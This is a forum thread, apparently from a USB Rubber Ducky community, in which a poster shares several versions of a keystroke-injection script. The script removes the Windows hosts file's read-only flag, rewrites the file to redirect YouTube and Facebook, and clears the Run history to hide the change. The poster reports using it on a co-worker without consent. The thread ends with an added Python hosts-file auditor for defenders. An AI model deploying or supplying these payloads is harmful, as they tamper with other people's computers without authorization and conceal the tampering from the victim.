Posts posted by TakkeX

  1. On a side note, you may want to also add a third redirect to the list. The "mobile" site was still accessible, but this should clear it up. Depending on how many sites you want to redirect, the second script should take about 40 seconds. :ph34r:

    STRING 74.125.228.97 FACEBOOK.COM
    ENTER
    STRING 74.125.228.97 WWW.FACEBOOK.COM
    ENTER

    STRING 74.125.228.97 MOBILE.FACEBOOK.COM
    ENTER

  2. After messing around with it a little bit, I cleaned it up. Then I successfully tested it on a lazy co-worker who surfs the net all day. :D This is written to have caps-lock on while running (not necessary), and the first script will "clear" the run history to prevent the target from locating the problem.

    Using this script the first time, the host files will be read-only. Use this:

    DELAY 3000
    DEFAULT_DELAY 250
    GUI r
    STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\
    ENTER
    CONTROL A
    SHIFT F10
    STRING R
    DELAY 500
    SPACE
    ENTER
    ENTER
    DELAY 1000
    LEFT
    ENTER
    DELAY 1000
    ALT F4
    CONTROL ESCAPE
    DELAY 500
    STRING cmd
    DELAY 500
    MENU
    DELAY 500
    STRING A
    ENTER
    DELAY 750
    LEFT
    ENTER
    DELAY 750
    STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 500
    STRING %windir%\system32\notepad.exe
    ENTER
    DELAY 500
    DEFAULT_DELAY 0
    STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
    ENTER
    STRING #
    ENTER
    STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
    ENTER
    STRING #
    ENTER
    STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
    ENTER
    STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
    ENTER
    STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
    ENTER
    STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
    ENTER
    STRING # SPACE.
    ENTER
    STRING #
    ENTER
    STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
    ENTER
    STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
    ENTER
    STRING #
    ENTER
    STRING # fOR EXAMPLE:
    ENTER
    STRING #
    ENTER
    STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
    ENTER
    STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
    ENTER
    ENTER
    STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
    ENTER
    STRING # 127.0.0.1 LOCALHOST
    ENTER
    STRING # ::1 LOCALHOST
    ENTER
    ENTER
    STRING 74.125.228.97 YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 WWW.YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 FACEBOOK.COM
    ENTER
    STRING 74.125.228.97 WWW.FACEBOOK.COM
    ENTER
    DEFAULT_DELAY 250
    CONTROL S
    STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 1000
    ALT F4
    DELAY 500
    STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
    ENTER
    DELAY 500
    STRING EXIT
    ENTER
    DELAY 500
    GUI r
    STRING MSCONFIG
    ENTER
    DELAY 750
    ALT F4

    After using the previous script once, the host files will be read-write. Use this:

    DELAY 3000
    DEFAULT_DELAY 250
    CONTROL ESCAPE
    DELAY 500
    STRING cmd
    DELAY 500
    MENU
    DELAY 500
    STRING A
    ENTER
    DELAY 750
    LEFT
    ENTER
    DELAY 750
    STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 500
    STRING %windir%\system32\notepad.exe
    ENTER
    DELAY 500
    DEFAULT_DELAY 0
    STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
    ENTER
    STRING #
    ENTER
    STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
    ENTER
    STRING #
    ENTER
    STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
    ENTER
    STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
    ENTER
    STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
    ENTER
    STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
    ENTER
    STRING # SPACE.
    ENTER
    STRING #
    ENTER
    STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
    ENTER
    STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
    ENTER
    STRING #
    ENTER
    STRING # fOR EXAMPLE:
    ENTER
    STRING #
    ENTER
    STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
    ENTER
    STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
    ENTER
    ENTER
    STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
    ENTER
    STRING # 127.0.0.1 LOCALHOST
    ENTER
    STRING # ::1 LOCALHOST
    ENTER
    ENTER
    STRING 74.125.228.97 YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 WWW.YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 FACEBOOK.COM
    ENTER
    STRING 74.125.228.97 WWW.FACEBOOK.COM
    ENTER
    DEFAULT_DELAY 250
    CONTROL S
    STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 1000
    ALT F4
    DELAY 500
    STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
    ENTER
    DELAY 500
    STRING EXIT
    ENTER

  3. Since no one wanted to help, I did it all myself. Can anyone clean this up a bit? I am guessing that I made this too complicated. It is designed for Win XP and Win 7.

    Change hosts file (read-only) to redirect Youtube + Facebook to Google.

    DELAY 3000
    DEFAULT_DELAY 250
    GUI r
    STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\
    ENTER
    CONTROL A
    SHIFT F10
    STRING R
    DELAY 500
    SPACE
    ENTER
    ENTER
    DELAY 1000
    LEFT
    ENTER
    DELAY 1000
    ALT F4
    GUI d
    CONTROL N
    ALT f
    STRING W
    DELAY 500
    STRING S
    DELAY 500
    STRING CMD.EXE
    ENTER
    STRING COMMANDPROMPT
    ENTER
    DELAY 500
    STRING COMMANDPROMPT
    SHIFT F10
    STRING A
    ENTER
    DELAY 750
    LEFT
    ENTER
    DELAY 750
    STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 500
    STRING %windir%\system32\notepad.exe
    ENTER
    DELAY 500
    DEFAULT_DELAY 0
    STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
    ENTER
    STRING #
    ENTER
    STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
    ENTER
    STRING #
    ENTER
    STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
    ENTER
    STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
    ENTER
    STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
    ENTER
    STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
    ENTER
    STRING # SPACE.
    ENTER
    STRING #
    ENTER
    STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
    ENTER
    STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
    ENTER
    STRING #
    ENTER
    STRING # fOR EXAMPLE:
    ENTER
    STRING #
    ENTER
    STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
    ENTER
    STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
    ENTER
    ENTER
    STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
    ENTER
    STRING # 127.0.0.1 LOCALHOST
    ENTER
    STRING # ::1 LOCALHOST
    ENTER
    ENTER
    STRING 74.125.228.97 YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 WWW.YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 FACEBOOK.COM
    ENTER
    STRING 74.125.228.97 WWW.FACEBOOK.COM
    ENTER
    DEFAULT_DELAY 250
    CONTROL S
    STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 1000
    ALT F4
    DELAY 500
    STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
    ENTER
    DELAY 500
    STRING EXIT
    ENTER
    ALT F4
    GUI d
    CONTROL N
    STRING COMMANDPROMPT
    DELETE
    ENTER
    ALT F4

    Change hosts file (write access) to redirect Youtube + Facebook to Google.

    DELAY 3000
    DEFAULT_DELAY 250

    GUI d
    CONTROL N
    ALT f
    STRING W
    DELAY 500
    STRING S
    DELAY 500
    STRING CMD.EXE
    ENTER
    STRING COMMANDPROMPT
    ENTER
    DELAY 500
    STRING COMMANDPROMPT
    SHIFT F10
    STRING A
    ENTER
    DELAY 750
    LEFT
    ENTER
    DELAY 750
    STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 500
    STRING %windir%\system32\notepad.exe
    ENTER
    DELAY 500
    DEFAULT_DELAY 0
    STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
    ENTER
    STRING #
    ENTER
    STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
    ENTER
    STRING #
    ENTER
    STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
    ENTER
    STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
    ENTER
    STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
    ENTER
    STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
    ENTER
    STRING # SPACE.
    ENTER
    STRING #
    ENTER
    STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
    ENTER
    STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
    ENTER
    STRING #
    ENTER
    STRING # fOR EXAMPLE:
    ENTER
    STRING #
    ENTER
    STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
    ENTER
    STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
    ENTER
    ENTER
    STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
    ENTER
    STRING # 127.0.0.1 LOCALHOST
    ENTER
    STRING # ::1 LOCALHOST
    ENTER
    ENTER
    STRING 74.125.228.97 YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 WWW.YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 FACEBOOK.COM
    ENTER
    STRING 74.125.228.97 WWW.FACEBOOK.COM
    ENTER
    DEFAULT_DELAY 250
    CONTROL S
    STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 1000
    ALT F4
    DELAY 500
    STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
    ENTER
    DELAY 500
    STRING EXIT
    ENTER
    ALT F4
    GUI d
    CONTROL N
    STRING COMMANDPROMPT
    DELETE
    ENTER
    ALT F4

  4. Ello everyone,

    I am very new with the ducky, and I am looking for some help.

    As I understand, powershell must be installed for any of the "Duck Toolkit" payloads to work. I was interested in DNS poisoning, but I can't get it to work correctly. I even tried to remove the command prompt section and have an administrative cmd already up and running before I plugged in my ducky. Everything went smoothly, but it still did nothing. I have disabled all my anti-virus programs and even tried a few random other DNS poisoning/host mod scripts that I randomly found on here and other websites. No luck.

    Is there a way to:

    1. copy "hosts.txt" (pre-created file) from my single ducky sd card to the \Windows\System32\drivers\etc folder

    2. delete "hosts" file in \Windows\System32\drivers\etc folder

    3. rename "hosts.txt" to just "hosts"

    Please, no powershell. It seems pretty simple, but I still have no idea what I am doing. :wacko:
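
Seen from the defending side, every script in this thread leaves the same artifact: a hosts file with active entries that point unrelated sites at one address, where the stock file the scripts retype has only comments. The following is an added example, not code from any of the posts; it audits hosts-file text for such entries. `SAMPLE_HOSTS` is constructed from the entries shown above, and `parse_hosts`, `base_domain` and `audit_hosts` are illustrative names.

```python
import ipaddress
from collections import defaultdict

# Constructed sample: hosts-file tail like the one typed above, plus two parser edge cases.
SAMPLE_HOSTS = """\
# LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
# 127.0.0.1 LOCALHOST
# ::1 LOCALHOST

74.125.228.97 YOUTUBE.COM
74.125.228.97 WWW.YOUTUBE.COM
74.125.228.97 FACEBOOK.COM   # trailing comment
74.125.228.97 WWW.FACEBOOK.COM
127.0.0.1 localhost
not-an-ip broken.example
"""

def parse_hosts(text):
    """Yield (line_number, ip, names) for every active, well-formed entry."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()   # drop comments, split on whitespace
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                             # first column is not an address
        yield lineno, ip, [n.lower().rstrip(".") for n in fields[1:]]

def base_domain(name):
    # Assumption: last two labels approximate the registered domain (no Public Suffix List).
    return ".".join(name.split(".")[-2:])

def audit_hosts(text):
    """Return (findings, shared): redirecting entries, and IPs shared by unrelated sites."""
    findings, by_ip = [], defaultdict(set)
    for lineno, ip, names in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue          # localhost and 0.0.0.0 blocklist entries are not redirects
        for name in names:
            findings.append({"line": lineno, "ip": str(ip), "name": name})
            by_ip[str(ip)].add(base_domain(name))
    shared = {ip: sorted(d) for ip, d in by_ip.items() if len(d) > 1}
    return findings, shared

if __name__ == "__main__":
    print(audit_hosts(SAMPLE_HOSTS))
```

On a Windows host, pass the contents of `%WINDIR%\System32\drivers\etc\hosts` to `audit_hosts`; a non-empty `shared` result means one address is answering for several unrelated sites.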
